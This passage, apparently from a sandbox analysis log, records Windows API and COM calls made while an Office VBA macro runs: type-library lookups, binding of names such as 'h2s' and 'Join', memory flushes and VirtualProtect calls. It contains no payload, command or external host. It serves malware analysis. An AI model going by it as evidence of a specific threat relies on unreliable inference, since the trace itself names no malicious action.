ppvObject=0x1dc820 | out: ppvObject=0x1dc820*=0x0) returned 0x80004002 [0202.965] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc060, pIndex=0x0 | out: ppTLib=0x1dc060*=0x9ab5f00, pIndex=0x0) returned 0x0 [0202.966] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc070, pDummy=0x0 | out: ppTLibAttr=0x1dc070, pDummy=0x0) returned 0x0 [0202.966] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0202.966] IUnknown:Release (This=0x9ab5f00) returned 0xe [0202.966] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612790, invkind=1, refPtrFlags=0x1dc060, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0202.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0202.966] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612790, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc060, pbstrName=0x0, pwOrdinal=0x1dc080 | out: pBstrDllName=0x1dc060*=0x0, pbstrName=0x0, pwOrdinal=0x1dc080*=0xc2f0) returned 0x0 [0202.966] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612790, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000) returned 0x0 [0202.966] _mbscpy_s (in: _Dst=0x1dc9f0, _DstSizeInBytes=0x2, _Src=0x5732bfe | out: _Dst=0x1dc9f0) returned 0x0 [0202.967] _mbscpy_s (in: _Dst=0x9653bf0, _DstSizeInBytes=0x4, _Src=0x5732c22 | out: _Dst=0x9653bf0) returned 0x0 [0202.967] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Chr") returned 0x103b5c [0202.967] IUnknown:AddRef (This=0x9ab5f00) returned 0xf [0202.967] IUnknown:Release (This=0x9ab5f00) returned 0xe [0202.968] IUnknown:AddRef (This=0xa121698) returned 0x8 [0202.968] IUnknown:Release (This=0xa121698) returned 0x7 [0202.968] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc828 | out: ppvObject=0x1dc828*=0x0) returned 0x80004002 [0202.968] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc820 | out: ppvObject=0x1dc820*=0x0) returned 0x80004002 [0202.968] IMalloc:Free (This=0x7fefecb5380, pv=0x9653bf0) [0202.984] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc060, pIndex=0x0 | out: ppTLib=0x1dc060*=0x9ab5f00, pIndex=0x0) returned 0x0 [0202.985] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc070, pDummy=0x0 | out: ppTLibAttr=0x1dc070, pDummy=0x0) returned 0x0 [0202.985] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0202.985] IUnknown:Release (This=0x9ab5f00) returned 0xe [0202.985] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612738, invkind=1, refPtrFlags=0x1dc060, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0202.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0202.985] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc060, pbstrName=0x0, pwOrdinal=0x1dc080 | out: pBstrDllName=0x1dc060*=0x0, pbstrName=0x0, pwOrdinal=0x1dc080*=0xc2f0) returned 0x0 [0202.985] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000) returned 0x0 [0202.985] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc5c8 | out: ppvObject=0x1dc5c8*=0x0) returned 0x80004002 [0202.985] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b108, ppTypeAttr=0x1dc5a8, pDummy=0x10 | out: ppTypeAttr=0x1dc5a8, pDummy=0x10) returned 0x0 [0202.985] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b108) returned 0x0 [0202.985] IUnknown:AddRef (This=0xa02b108) returned 0x6 [0202.985] IUnknown:Release (This=0xa02b108) returned 0x5 [0202.986] IUnknown:Release (This=0xa02b108) returned 0x4 [0202.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732c6a, cbMultiByte=5, lpWideCharStr=0x1dc590, cchWideChar=6 | out: lpWideCharStr="Join") returned 5 [0202.986] ITypeComp:RemoteBind (in: This=0xa02b110, szName="Join", lHashVal=0x10264d, wFlags=0x3, ppTInfo=0x1dc548, pDescKind=0x1dc55c, ppFuncDesc=0x1dc560, ppVarDesc=0x7fefdea2ca4, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc548*=0x0, pDescKind=0x1dc55c*=0, ppFuncDesc=0x1dc560, ppVarDesc=0x7fefdea2ca4, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0202.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732c6a, cbMultiByte=5, lpWideCharStr=0x1dc5d0, cchWideChar=6 | out: lpWideCharStr="Join") returned 5 [0202.986] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="Join", lHashVal=0x10264d, wFlags=0x3, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0xa121698, pDescKind=0x1dc59c*=1, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0202.987] ITypeInfo:RemoteGetTypeAttr (in: This=0xa121698, ppTypeAttr=0x1dc590, pDummy=0x1 | out: ppTypeAttr=0x1dc590, pDummy=0x1) returned 0x0 [0202.987] ITypeInfo:LocalReleaseTypeAttr (This=0xa121698) returned 0x0 [0202.987] IMalloc:Realloc (This=0x7fefecb5380, pv=0xa2de6e0, cb=0x1000) returned 0x7bfac30 [0202.987] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1dc3f0 | out: ppvObject=0x1dc3f0*=0xa121698) returned 0x0 [0202.987] ITypeInfo2:GetFuncIndexOfMemId (in: This=0xa121698, memid=1610612787, invkind=1, pFuncIndex=0x1dc430 | out: pFuncIndex=0x1dc430*=0x33) returned 0x0 [0202.987] ITypeInfo2:GetFuncCustData (in: This=0xa121698, index=0x33, GUID=0x7fee51d3758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x1dc448 | out: pVarVal=0x1dc448*(varType=0x0, wReserved1=0x1d, wReserved2=0x0, wReserved3=0x0, varVal1=0x33, varVal2=0x10264d)) returned 0x0 [0202.987] IUnknown:Release (This=0xa121698) returned 0x8 [0202.987] IUnknown:AddRef (This=0xa121698) returned 0x9 [0202.987] ITypeInfo:LocalReleaseFuncDesc (This=0xa121698) returned 0x0 [0202.987] IUnknown:Release (This=0xa121698) returned 0x8 [0202.988] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc6b8 | out: ppvObject=0x1dc6b8*=0x0) returned 0x80004002 [0202.988] IUnknown:AddRef (This=0xa121698) returned 0x9 [0202.988] IUnknown:Release (This=0xa121698) returned 0x8 [0202.988] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc828 | out: ppvObject=0x1dc828*=0x0) returned 0x80004002 [0202.988] IUnknown:QueryInterface (in: This=0xa121698, riid=0x7fee51d0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc820 | out: ppvObject=0x1dc820*=0x0) returned 0x80004002 [0202.988] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc060, pIndex=0x0 | out: ppTLib=0x1dc060*=0x9ab5f00, pIndex=0x0) returned 0x0 [0202.988] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc070, pDummy=0x0 | out: ppTLibAttr=0x1dc070, pDummy=0x0) returned 0x0 [0202.988] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0202.988] IUnknown:Release (This=0x9ab5f00) returned 0xf [0202.988] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612787, invkind=1, refPtrFlags=0x1dc060, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0202.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0202.988] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612787, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc060, pbstrName=0x0, pwOrdinal=0x1dc080 | out: pBstrDllName=0x1dc060*=0x0, pbstrName=0x0, pwOrdinal=0x1dc080*=0xc2f0) returned 0x0 [0202.988] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612787, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc060, pwOrdinal=0x500000000) returned 0x0 [0202.988] IMalloc:Alloc (This=0x7fefecb5380, cb=0x26d) returned 0xa189220 [0202.988] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0202.988] IMalloc:GetSize (This=0x7fefecb5380, pv=0xa189220) returned 0x26d [0202.989] GetCurrentProcess () returned 0xffffffffffffffff [0202.989] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xa189220, dwSize=0x43) returned 1 [0202.989] IMalloc:Free (This=0x7fefecb5380, pv=0xa189220) [0202.989] IMalloc:Alloc (This=0x7fefecb5380, cb=0x230) returned 0x95e2d90 [0202.989] IUnknown:AddRef (This=0xa02b108) returned 0x5 [0202.989] IUnknown:QueryInterface (in: This=0xa02b108, riid=0x7fee51c5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1dc5c8 | out: ppvObject=0x1dc5c8*=0x0) returned 0x80004002 [0202.989] ITypeInfo:RemoteGetTypeAttr (in: This=0xa02b108, ppTypeAttr=0x1dc5a8, pDummy=0x10 | out: ppTypeAttr=0x1dc5a8, pDummy=0x10) returned 0x0 [0202.989] ITypeInfo:LocalReleaseTypeAttr (This=0xa02b108) returned 0x0 [0202.989] IUnknown:AddRef (This=0xa02b108) returned 0x6 [0202.989] IUnknown:Release (This=0xa02b108) returned 0x5 [0202.989] IUnknown:Release (This=0xa02b108) returned 0x4 [0202.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732c46, cbMultiByte=4, lpWideCharStr=0x1dc590, cchWideChar=5 | out: lpWideCharStr="h2s") returned 4 [0202.989] ITypeComp:RemoteBind (in: This=0xa02b110, szName="h2s", lHashVal=0x1095db, wFlags=0x5, ppTInfo=0x1dc548, pDescKind=0x1dc55c, ppFuncDesc=0x1dc560, ppVarDesc=0x7fefdea2ca4, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc548*=0x0, pDescKind=0x1dc55c*=0, ppFuncDesc=0x1dc560, ppVarDesc=0x7fefdea2ca4, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0202.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732c46, cbMultiByte=4, lpWideCharStr=0x1dc5d0, cchWideChar=5 | out: lpWideCharStr="h2s") returned 4 [0202.989] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="h2s", lHashVal=0x1095db, wFlags=0x5, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0202.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732c46, cbMultiByte=4, lpWideCharStr=0x1dc5d0, cchWideChar=5 | out: lpWideCharStr="h2s") returned 4 [0202.989] ITypeComp:RemoteBind (in: This=0x9ab4b60, szName="h2s", lHashVal=0x1095db, wFlags=0x5, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0202.990] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732c46, cbMultiByte=4, lpWideCharStr=0x1dc5d0, cchWideChar=5 | out: lpWideCharStr="h2s") returned 4 [0202.990] ITypeComp:RemoteBind (in: This=0x9ab64b0, szName="h2s", lHashVal=0x1095db, wFlags=0x5, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0202.990] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5732c46, cbMultiByte=4, lpWideCharStr=0x1dc5d0, cchWideChar=5 | out: lpWideCharStr="h2s") returned 4 [0202.990] ITypeComp:RemoteBind (in: This=0x9ab6a50, szName="h2s", lHashVal=0x1095db, wFlags=0x5, ppTInfo=0x1dc588, pDescKind=0x1dc59c, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc588*=0x0, pDescKind=0x1dc59c*=0, ppFuncDesc=0x1dc5a0, ppVarDesc=0x7887fa0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0202.991] IMalloc:Alloc (This=0x7fefecb5380, cb=0xb) returned 0x9653bf0 [0202.991] _mbscpy_s (in: _Dst=0x9653bf0, _DstSizeInBytes=0x4, _Src=0x5732c46 | out: _Dst=0x9653bf0) returned 0x0 [0202.991] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_h2s") returned 0x1052ec [0202.991] strcpy_s (in: _Dst=0x1dc6e0, _DstSize=0xb, _Src="_B_var_h2s" | out: _Dst="_B_var_h2s") returned 0x0 [0202.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dc6e0, cbMultiByte=11, lpWideCharStr=0x1dc530, cchWideChar=11 | out: lpWideCharStr="_B_var_h2s") returned 11 [0202.991] IUnknown:AddRef (This=0x9ab5f00) returned 0x10 [0202.991] ITypeLib:RemoteIsName (in: This=0x9ab5f00, szNameBuf="_B_var_h2s", lHashVal=0x1052ec, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=0, pBstrLibName=0x1dc530) returned 0x0 [0202.991] IUnknown:Release (This=0x9ab5f00) returned 0xf [0202.991] IUnknown:AddRef (This=0x9ab4b50) returned 0x22 [0202.991] ITypeLib:RemoteIsName (in: This=0x9ab4b50, szNameBuf="_B_var_h2s", lHashVal=0x1052ec, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=0, pBstrLibName=0x1dc530) returned 0x0 [0202.991] IUnknown:Release (This=0x9ab4b50) returned 0x21 [0202.991] IUnknown:AddRef (This=0x9ab64a0) returned 0x6 [0202.991] ITypeLib:RemoteIsName (in: This=0x9ab64a0, szNameBuf="_B_var_h2s", lHashVal=0x1052ec, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=0, pBstrLibName=0x1dc530) returned 0x0 [0202.991] IUnknown:Release (This=0x9ab64a0) returned 0x5 [0202.991] IUnknown:AddRef (This=0x9ab6a40) returned 0x4 [0202.991] ITypeLib:RemoteIsName (in: This=0x9ab6a40, szNameBuf="_B_var_h2s", lHashVal=0x1052ec, pfName=0x1dc600, pBstrLibName=0x1dc530 | out: pfName=0x1dc600*=0, pBstrLibName=0x1dc530) returned 0x0 [0202.991] IUnknown:Release (This=0x9ab6a40) returned 0x3 [0202.991] IUnknown:AddRef (This=0x9ab5f00) returned 0x10 [0202.991] IUnknown:Release (This=0x9ab5f00) returned 0xf [0202.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x63a08e6, cbMultiByte=11, lpWideCharStr=0x1dc590, cchWideChar=12 | out: lpWideCharStr="_B_var_h2s") returned 11 [0202.992] ITypeComp:RemoteBind (in: This=0x9ab5f10, szName="_B_var_h2s", lHashVal=0x1052ec, wFlags=0x5, ppTInfo=0x1dc548, pDescKind=0x1dc55c, ppFuncDesc=0x1dc560, ppVarDesc=0x68005f00720061, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x1dc548*=0x0, pDescKind=0x1dc55c*=0, ppFuncDesc=0x1dc560, ppVarDesc=0x68005f00720061, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0202.992] _mbscpy_s (in: _Dst=0x1dc750, _DstSizeInBytes=0x4, _Src=0x5732c46 | out: _Dst=0x1dc750) returned 0x0 [0202.992] IMalloc:Free (This=0x7fefecb5380, pv=0x9653bf0) [0202.992] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc390, pIndex=0x0 | out: ppTLib=0x1dc390*=0x9ab5f00, pIndex=0x0) returned 0x0 [0202.992] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc3a0, pDummy=0x0 | out: ppTLibAttr=0x1dc3a0, pDummy=0x0) returned 0x0 [0202.992] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0202.992] IUnknown:Release (This=0x9ab5f00) returned 0xf [0202.992] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612790, invkind=1, refPtrFlags=0x1dc390, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0202.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0202.992] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612790, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc390, pbstrName=0x0, pwOrdinal=0x1dc3b0 | out: pBstrDllName=0x1dc390*=0x0, pbstrName=0x0, pwOrdinal=0x1dc3b0*=0xc620) returned 0x0 [0202.992] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612790, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc390, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc390, pwOrdinal=0x500000000) returned 0x0 [0202.992] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc2f0, pIndex=0x0 | out: ppTLib=0x1dc2f0*=0x9ab5f00, pIndex=0x0) returned 0x0 [0202.992] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc300, pDummy=0x0 | out: ppTLibAttr=0x1dc300, pDummy=0x0) returned 0x0 [0202.992] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0202.992] IUnknown:Release (This=0x9ab5f00) returned 0xf [0202.992] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612738, invkind=1, refPtrFlags=0x1dc2f0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0202.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0202.992] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc2f0, pbstrName=0x0, pwOrdinal=0x1dc310 | out: pBstrDllName=0x1dc2f0*=0x0, pbstrName=0x0, pwOrdinal=0x1dc310*=0xc580) returned 0x0 [0202.993] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc2f0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc2f0, pwOrdinal=0x500000000) returned 0x0 [0202.993] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xa121698, ppTLib=0x1dc340, pIndex=0x0 | out: ppTLib=0x1dc340*=0x9ab5f00, pIndex=0x0) returned 0x0 [0202.993] ITypeLib:RemoteGetLibAttr (in: This=0x9ab5f00, ppTLibAttr=0x1dc350, pDummy=0x0 | out: ppTLibAttr=0x1dc350, pDummy=0x0) returned 0x0 [0202.993] ITypeLib:LocalReleaseTLibAttr (This=0x9ab5f00) returned 0x0 [0202.993] IUnknown:Release (This=0x9ab5f00) returned 0xf [0202.993] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612787, invkind=1, refPtrFlags=0x1dc340, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x529b480*=0x5380) returned 0x0 [0202.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee51fd830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0202.993] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612787, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1dc340, pbstrName=0x0, pwOrdinal=0x1dc360 | out: pBstrDllName=0x1dc340*=0x0, pbstrName=0x0, pwOrdinal=0x1dc360*=0xc5d0) returned 0x0 [0202.993] ITypeInfo:RemoteGetDllEntry (in: This=0xa121698, memid=1610612787, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1dc340, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1dc340, pwOrdinal=0x500000000) returned 0x0 [0202.993] IMalloc:Realloc (This=0x7fefecb5380, pv=0x9aa6420, cb=0x1f8) returned 0xa0c3870 [0202.993] IMalloc:Free (This=0x7fefecb5380, pv=0x95a2910) [0202.993] GetCurrentProcess () returned 0xffffffffffffffff [0202.993] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55259, dwSize=0x8) returned 1 [0202.993] GetCurrentProcess () returned 0xffffffffffffffff [0202.993] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55258, dwSize=0x8) returned 1 [0202.993] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55259, dwSize=0x8) returned 1 [0202.993] GetCurrentProcess () returned 0xffffffffffffffff [0202.993] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55258, dwSize=0x8) returned 1 [0202.993] GetCurrentProcess () returned 0xffffffffffffffff [0202.993] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55268, dwSize=0x2) returned 1 [0202.993] GetCurrentProcess () returned 0xffffffffffffffff [0202.993] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c552bc, dwSize=0x55) returned 1 [0202.994] VirtualProtect (in: lpAddress=0x9c552bc, dwSize=0x58, flNewProtect=0x40, lpflOldProtect=0x1dc7ac | out: lpflOldProtect=0x1dc7ac*=0x40) returned 1 [0202.995] GetCurrentProcess () returned 0xffffffffffffffff [0202.995] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c553c1, dwSize=0x8) returned 1 [0202.995] GetCurrentProcess () returned 0xffffffffffffffff [0202.995] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c553c0, dwSize=0x8) returned 1 [0202.995] GetCurrentProcess () returned 0xffffffffffffffff [0202.995] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c553d0, dwSize=0x2) returned 1 [0202.995] GetCurrentProcess () returned 0xffffffffffffffff [0202.995] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55424, dwSize=0x45) returned 1 [0202.995] VirtualProtect (in: lpAddress=0x9c55424, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x1dc7ac | out: lpflOldProtect=0x1dc7ac*=0x40) returned 1 [0202.995] GetCurrentProcess () returned 0xffffffffffffffff [0202.995] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c554ac, dwSize=0x45) returned 1 [0202.995] VirtualProtect (in: lpAddress=0x9c554ac, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x1dc7ac | out: lpflOldProtect=0x1dc7ac*=0x40) returned 1 [0202.996] GetCurrentProcess () returned 0xffffffffffffffff [0202.996] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55529, dwSize=0x8) returned 1 [0202.996] GetCurrentProcess () returned 0xffffffffffffffff [0202.996] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55528, dwSize=0x8) returned 1 [0202.996] GetCurrentProcess () returned 0xffffffffffffffff [0202.996] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c55538, dwSize=0x2) returned 1 [0202.996] GetCurrentProcess () returned 0xffffffffffffffff [0202.996] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x9c54f30, dwSize=0x5d) returned 1 